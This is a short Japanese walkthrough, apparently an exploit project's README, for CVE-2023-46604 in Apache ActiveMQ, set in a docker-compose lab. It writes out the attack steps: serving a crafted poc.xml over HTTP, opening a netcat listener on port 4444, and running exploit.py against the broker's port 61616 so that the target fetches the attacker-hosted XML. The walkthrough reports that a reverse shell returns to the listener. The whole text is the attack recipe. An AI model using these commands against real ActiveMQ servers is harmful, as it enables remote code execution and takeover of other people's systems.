
CVE-2023-46604 の Apache ActiveMQ 向けエクスプロイト。細工された XML ペイロードを介したリモートコード実行とリバースシェルの確立を可能にします。
CVE-2023-46604

要件に従って、被害者マシンとターゲットマシンの2つのイメージを含むdocker-composeを構築します
被害者マシンでActiveMQを起動します
攻撃者マシンに切り替えます: • HTTPサービスを開き、PoCを送信します: python3 -m http.server
• netcatを使用して攻撃者マシンへの接続を待ち受けます nc -nlvp 4444
• リバースシェル接続を攻撃者マシンに作成するペイロードを送信します python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml 内訳:
見てわかるように、'exploit.py'ファイルを実行すると、エクスプロイトコードはWebサーバー上の'poc.xml'パケットを、ターゲットサーバー上で動作しているActiveMQサービスのアドレスに送信します。同時に、攻撃者マシンのHTTP WebサーバーもターゲットマシンのIPアドレスから送信されたリクエストを受信します。
ペイロードを送信した後、攻撃者マシンのポート4444で待ち受けているターミナルに切り替えます。被害者マシンのリバースシェルが送られてきていることがわかります。